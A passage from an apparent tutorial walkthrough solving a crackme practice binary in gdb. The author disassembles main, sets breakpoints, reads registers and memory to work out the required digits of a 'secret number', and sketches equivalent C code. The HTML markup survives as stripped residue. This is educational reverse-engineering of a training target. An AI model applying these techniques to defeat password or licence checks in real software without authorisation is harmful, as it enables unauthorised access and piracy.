class="go" 0x08048708 lt;+188gt;: mov BYTE PTR [esp+0x16],al/span/span span class="code-line"span class="go" 0x0804870c lt;+192gt;: lea edx,[esp+0x35]/span/span span class="code-line"span class="go" 0x08048710 lt;+196gt;: mov eax,DWORD PTR [esp+0x24]/span/span span class="code-line"span class="go" 0x08048714 lt;+200gt;: add eax,edx/span/span span class="code-line"span class="go" 0x08048716 lt;+202gt;: movzx eax,BYTE PTR [eax]/span/span span class="code-line"span class="go" 0x08048719 lt;+205gt;: mov BYTE PTR [esp+0x17],al/span/span span class="code-line"span class="go" 0x0804871d lt;+209gt;: lea eax,[esp+0x2d]/span/span span class="code-line"span class="go" 0x08048721 lt;+213gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048724 lt;+216gt;: call 0x80484d0 lt;strlen@pltgt;/span/span span class="code-line"span class="go" 0x08048729 lt;+221gt;: cmp eax,0x7/span/span span class="code-line"span class="go" 0x0804872c lt;+224gt;: ja 0x8048746 lt;main+250gt;/span/span span class="code-line"span class="go" 0x0804872e lt;+226gt;: lea eax,[esp+0x15]/span/span span class="code-line"span class="go" 0x08048732 lt;+230gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048735 lt;+233gt;: call 0x8048500 lt;atoi@pltgt;/span/span span class="code-line"span class="go" 0x0804873a lt;+238gt;: lea ecx,[esp+0x2d]/span/span span class="code-line"span class="go" 0x0804873e lt;+242gt;: mov edx,DWORD PTR [esp+0x18]/span/span span class="code-line"span class="go" 0x08048742 lt;+246gt;: add edx,ecx/span/span span class="code-line"span class="go" 0x08048744 lt;+248gt;: mov BYTE PTR [edx],al/span/span span class="code-line"span class="go" 0x08048746 lt;+250gt;: add DWORD PTR [esp+0x18],0x1/span/span span class="code-line"span class="go" 0x0804874b lt;+255gt;: add DWORD PTR [esp+0x1c],0x3/span/span span class="code-line"span class="go" 0x08048750 lt;+260gt;: add DWORD PTR [esp+0x20],0x3/span/span span class="code-line"span class="go" 0x08048755 lt;+265gt;: add DWORD PTR [esp+0x24],0x3/span/span span class="code-line"span class="go" 0x0804875a lt;+270gt;: cmp DWORD PTR [esp+0x1c],0x14/span/span span class="code-line"span class="go" 0x0804875f lt;+275gt;: jle 0x80486ea lt;main+158gt;/span/span span class="code-line"span class="go" 0x08048761 lt;+277gt;: mov DWORD PTR [esp+0x4],0x8048886/span/span span class="code-line"span class="go" 0x08048769 lt;+285gt;: lea eax,[esp+0x2d]/span/span span class="code-line"span class="go" 0x0804876d lt;+289gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048770 lt;+292gt;: call 0x8048460 lt;strcmp@pltgt;/span/span span class="code-line"span class="go"---Type lt;returngt; to continue, or q lt;returngt; to quit---/span/span span class="code-line"span class="go" 0x08048775 lt;+297gt;: test eax,eax/span/span span class="code-line"span class="go" 0x08048777 lt;+299gt;: jne 0x8048794 lt;main+328gt;/span/span span class="code-line"span class="go" 0x08048779 lt;+301gt;: lea eax,[esp+0x2d]/span/span span class="code-line"span class="go" 0x0804877d lt;+305gt;: mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="go" 0x08048781 lt;+309gt;: mov DWORD PTR [esp],0x8048890/span/span span class="code-line"span class="go" 0x08048788 lt;+316gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x0804878d lt;+321gt;: call 0x8048638 lt;yesgt;/span/span span class="code-line"span class="go" 0x08048792 lt;+326gt;: jmp 0x8048799 lt;main+333gt;/span/span span class="code-line"span class="go" 0x08048794 lt;+328gt;: call 0x804860d lt;nopegt;/span/span span class="code-line"span class="go" 0x08048799 lt;+333gt;: mov eax,0x0/span/span span class="code-line"span class="go" 0x0804879e lt;+338gt;: mov ebx,DWORD PTR [esp+0x4c]/span/span span class="code-line"span class="go" 0x080487a2 lt;+342gt;: xor ebx,DWORD PTR gs:0x14/span/span span class="code-line"span class="go" 0x080487a9 lt;+349gt;: je 0x80487b0 lt;main+356gt;/span/span span class="code-line"span class="go" 0x080487ab lt;+351gt;: call 0x8048490 lt;__stack_chk_fail@pltgt;/span/span span class="code-line"span class="go" 0x080487b0 lt;+356gt;: mov ebx,DWORD PTR [ebp-0x4]/span/span span class="code-line"span class="go" 0x080487b3 lt;+359gt;: leave /span/span span class="code-line"span class="go" 0x080487b4 lt;+360gt;: ret /span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pFirstly on line 3 I set the disassembly flavor to codeintel/code, this is because I'm more confortable with assembly in intel syntax, it defaults to ATamp;T./p pLooking at the output of codeinfo functions/code its obvious that this application was written in C due to the calls to functions in the C standard library like codestrcmp/code on line 9 and codeprintf/code on line 11. So we can assume that the codemain/code function on line 39 is the start of the application from the programmers point of view so we disassemble that function on line 43./p pFrom the disassembly it looks like +29 (line 54) is where its printing 'Please enter the secret number:' and +49 (line 58) is where its getting my input. There are some cmp's going on at +58 (line 60), +70 (line 63) and +79 (line 66), lets run it in gdb, set a a href="https://en.wikipedia.org/wiki/Breakpoint"breakpoint/a just after the call to scanf (at +49 or line 58) and step through it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x08048682/span/span span class="code-line"span class="go"Breakpoint 1 at 0x8048682/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /root/crackme/crackmes/crackme1_32bit/span/span span class="code-line"span class="go"Please enter the secret number: 12345678/span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 1, 0x08048682 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble $eip,+10/span/span span class="code-line"span class="go"Dump of assembler code from 0x8048682 to 0x804868c:/span/span span class="code-line"span class="go"=gt; 0x08048682 lt;main+54gt;: mov DWORD PTR [esp+0x28],eax/span/span span class="code-line"span class="go" 0x08048686 lt;main+58gt;: cmp DWORD PTR [esp+0x28],0x1/span/span span class="code-line"span class="go" 0x0804868b lt;main+63gt;: jne 0x804869f lt;main+83gt;/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"p $eax/span/span span class="code-line"span class="gp"$/spanspan class="nv"1/span span class="o"=/span span class="m"1/span/span span class="code-line"/code/pre/div /td/tr/table pSo the EAX a href="https://en.wikipedia.org/wiki/Processor_register"register/a contains the value 1, this value is put into the the memory address pointed to by ESP+0x28 on line 10, which is most likely a pointer variable to a codeint/code or codeunsigned int/code on the stack. This value is then compared to 0x1 (or 1 in decimal) on line 11 and finally if the comparisons are not equal execution jumps to 0x804869f./p p0x804869f is on line 68 (+83) of the disassembly above and all it does is call the codenope/code function. Lets disassemble the codenope/code function and see what it does:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble nope/span/span span class="code-line"span class="go"Dump of assembler code for function nope:/span/span span class="code-line"span class="go" 0x0804860d lt;+0gt;: push ebp/span/span span class="code-line"span class="go" 0x0804860e lt;+1gt;: mov ebp,esp/span/span span class="code-line"span class="go" 0x08048610 lt;+3gt;: sub esp,0x18/span/span span class="code-line"span class="go" 0x08048613 lt;+6gt;: mov eax,ds:0x804a040/span/span span class="code-line"span class="go" 0x08048618 lt;+11gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804861b lt;+14gt;: call 0x8048480 lt;fflush@pltgt;/span/span span class="code-line"span class="go" 0x08048620 lt;+19gt;: mov DWORD PTR [esp],0x8048850/span/span span class="code-line"span class="go" 0x08048627 lt;+26gt;: call 0x80484a0 lt;puts@pltgt;/span/span span class="code-line"span class="go" 0x0804862c lt;+31gt;: mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="go" 0x08048633 lt;+38gt;: call 0x80484c0 lt;exit@pltgt;/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0x8048850/span/span span class="code-line"span class="go"0x8048850: quot;Nope.quot;/span/span span class="code-line"/code/pre/div /td/tr/table pClearly this would be bad as it seems to be printing the value codeNope./code using the puts command on line 10 and exit's the application with exit code 1 on line 12. Looking at a href="http://linux.die.net/man/3/scanf"man scanf/a, it says: /p blockquote pThese functions return the number of input items successfully matched and assigned, which can be fewer than provided for, or even zero in the event of an early matching failure./p pThe value EOF is returned if the end of input is reached before either the first successful conversion or a matching failure occurs. EOF is also returned if a read error occurs/p /blockquote pLets look at the other comparisons:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"delete 1/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x0804868d/span/span span class="code-line"span class="go"Breakpoint 2 at 0x804868d/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /root/crackmes/crackme1_32bit/span/span span class="code-line"span class="go"Please enter the secret number: 12345678/span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 2, 0x0804868d in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass $eip,+10/span/span span class="code-line"span class="go"Dump of assembler code from 0x804868d to 0x8048697:/span/span span class="code-line"span class="go"=gt; 0x0804868d lt;main+65gt;: movzx eax,BYTE PTR [esp+0x36]/span/span span class="code-line"span class="go" 0x08048692 lt;main+70gt;: cmp al,0x39/span/span span class="code-line"span class="go" 0x08048694 lt;main+72gt;: jne 0x804869f lt;main+83gt;/span/span span class="code-line"span class="go" 0x08048696 lt;main+74gt;: movzx eax,BYTE PTR [esp+0x35]/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/xb $esp+0x36/span/span span class="code-line"span class="go"0xbffffc66: 0x32/span/span span class="code-line"/code/pre/div /td/tr/table pThis is comparing 0x32 (or 2 in ascii) with 0x39 (or 9 in ascii), so this going to fail and jump to the nope call. As I only put 1 '2' in my number I guess we can assume that this is the 2nd value in the number, lets replace that and see what happens:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /root/crackmes/crackme1_32bit/span/span span class="code-line"span class="go"Please enter the secret number: 19345678/span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 2, 0x0804868d in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass $eip,+20/span/span span class="code-line"span class="go"Dump of assembler code from 0x804868d to 0x80486a1:/span/span span class="code-line"span class="go"=gt; 0x0804868d lt;main+65gt;: movzx eax,BYTE PTR [esp+0x36]/span/span span class="code-line"span class="go" 0x08048692 lt;main+70gt;: cmp al,0x39/span/span span class="code-line"span class="go" 0x08048694 lt;main+72gt;: jne 0x804869f lt;main+83gt;/span/span span class="code-line"span class="go" 0x08048696 lt;main+74gt;: movzx eax,BYTE PTR [esp+0x35]/span/span span class="code-line"span class="go" 0x0804869b lt;main+79gt;: cmp al,0x36/span/span span class="code-line"span class="go" 0x0804869d lt;main+81gt;: je 0x80486a6 lt;main+90gt;/span/span span class="code-line"span class="go" 0x0804869f lt;main+83gt;: call 0x804860d lt;nopegt;/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/xb $esp+0x36/span/span span class="code-line"span class="go"0xbffffc66: 0x39/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/xb $esp+0x35/span/span span class="code-line"span class="go"0xbffffc65: 0x31/span/span span class="code-line"/code/pre/div /td/tr/table pSo we have our 2nd number, but looking at the next comparison, we need 6 as our first number, lets start again:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"delete 2/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x0804869d/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /root/crackme/crackmes/crackme1_32bit/span/span span class="code-line"span class="go"Please enter the secret number: 69345678/span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 3, 0x0804869d in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass $eip,+20/span/span span class="code-line"span class="go"Dump of assembler code from 0x804869d to 0x80486b1:/span/span span class="code-line"span class="go"=gt; 0x0804869d lt;main+81gt;: je 0x80486a6 lt;main+90gt;/span/span span class="code-line"span class="go" 0x0804869f lt;main+83gt;: call 0x804860d lt;nopegt;/span/span span class="code-line"span class="go" 0x080486a4 lt;main+88gt;: jmp 0x80486b3 lt;main+103gt;/span/span span class="code-line"span class="go" 0x080486a6 lt;main+90gt;: mov eax,ds:0x804a040/span/span span class="code-line"span class="go" 0x080486ab lt;main+95gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x080486ae lt;main+98gt;: call 0x8048480 lt;fflush@pltgt;/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"stepi/span/span span class="code-line"span class="go"0x080486a6 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass $eip,+20/span/span span class="code-line"span class="go"Dump of assembler code from 0x80486a6 to 0x80486ba:/span/span span class="code-line"span class="go"=gt; 0x080486a6 lt;main+90gt;: mov eax,ds:0x804a040/span/span span class="code-line"span class="go" 0x080486ab lt;main+95gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x080486ae lt;main+98gt;: call 0x8048480 lt;fflush@pltgt;/span/span span class="code-line"span class="go" 0x080486b3 lt;main+103gt;: mov DWORD PTR [esp+0x2d],0x0/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pThat worked, now we have the knowledge to create the first part of the application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"nope/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"puts/spanspan class="p"(/spanspan class="s"quot;Nope.quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="mi"50/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Please enter the secret number: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"scanf/spanspan class="p"(/spanspan class="s"quot;%49squot;/spanspan class="p",/spanspan class="w" /spanspan class="n"input/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="mi"1/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"r/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="sc"#39;9#39;/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"])/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="sc"#39;6#39;/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"])/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fflush/spanspan class="p"(/spanspan class="n"stdin/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="cm"/* REST OF APPLICATION *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThe actual source code might not be exactly the same but this application fragment will give the same result./p pNow lets look at the rest of the code, specifically the calls to strlen, atoi and strcmp:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"delete 3/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x08048724/span/span span class="code-line"span class="go"Breakpoint 4 at 0x8048724/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x08048735/span/span span class="code-line"span class="go"Breakpoint 5 at 0x8048735/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x08048770/span/span span class="code-line"span class="go"Breakpoint 6 at 0x8048770/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"c/span/span span class="code-line"span class="go"Continuing./span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 4, 0x08048724 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass $eip,+20/span/span span class="code-line"span class="go"Dump of assembler code from 0x8048724 to 0x8048738:/span/span span class="code-line"span class="go"=gt; 0x08048724 lt;main+216gt;: call 0x80484d0 lt;strlen@pltgt;/span/span span class="code-line"span class="go" 0x08048729 lt;main+221gt;: cmp eax,0x7/span/span span class="code-line"span class="go" 0x0804872c lt;main+224gt;: ja 0x8048746 lt;main+250gt;/span/span span class="code-line"span class="go" 0x0804872e lt;main+226gt;: lea eax,[esp+0x15]/span/span span class="code-line"span class="go" 0x08048732 lt;main+230gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048735 lt;main+233gt;: call 0x8048500 lt;atoi@pltgt;/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pSo we are at the strlen, looking at the next instruction the result of this is compared with 0x7, lets step inside it and look at the arguments:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"stepi/span/span span class="code-line"span class="go"0x080484d0 in strlen@plt ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/3xw $esp/span/span span class="code-line"span class="go"0xbffffc2c: 0x08048729 0xbffffc5d 0xbffffc65/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0xbffffc5d/span/span span class="code-line"span class="go"0xbffffc5d: quot;Equot;/span/span span class="code-line"/code/pre/div /td/tr/table pHmmm... ok, we have an 'E' as the argument, lets continue.../p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"c/span/span span class="code-line"span class="go"Continuing./span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 5, 0x08048735 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass $eip,+20/span/span span class="code-line"span class="go"Dump of assembler code from 0x8048735 to 0x8048749:/span/span span class="code-line"span class="go"=gt; 0x08048735 lt;main+233gt;: call 0x8048500 lt;atoi@pltgt;/span/span span class="code-line"span class="go" 0x0804873a lt;main+238gt;: lea ecx,[esp+0x2d]/span/span span class="code-line"span class="go" 0x0804873e lt;main+242gt;: mov edx,DWORD PTR [esp+0x18]/span/span span class="code-line"span class="go" 0x08048742 lt;main+246gt;: add edx,ecx/span/span span class="code-line"span class="go" 0x08048744 lt;main+248gt;: mov BYTE PTR [edx],al/span/span span class="code-line"span class="go" 0x08048746 lt;main+250gt;: add DWORD PTR [esp+0x18],0x1/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pWe are now at the atoi call, again lets step inside and have a peek at the arguments:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"stepi/span/span span class="code-line"span class="go"0x08048500 in atoi@plt ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/3xw $esp/span/span span class="code-line"span class="go"0xbffffc2c: 0x0804873a 0xbffffc45 0xbffffc65/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0xbffffc45/span/span span class="code-line"span class="go"0xbffffc45: quot;345\001quot;/span/span span class="code-line"/code/pre/div /td/tr/table pOk, so that looks like the next 3 numbers I put in as my secret number (69345678), lets continue:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"c/span/span span class="code-line"span class="go"Continuing./span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 4, 0x08048724 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disass 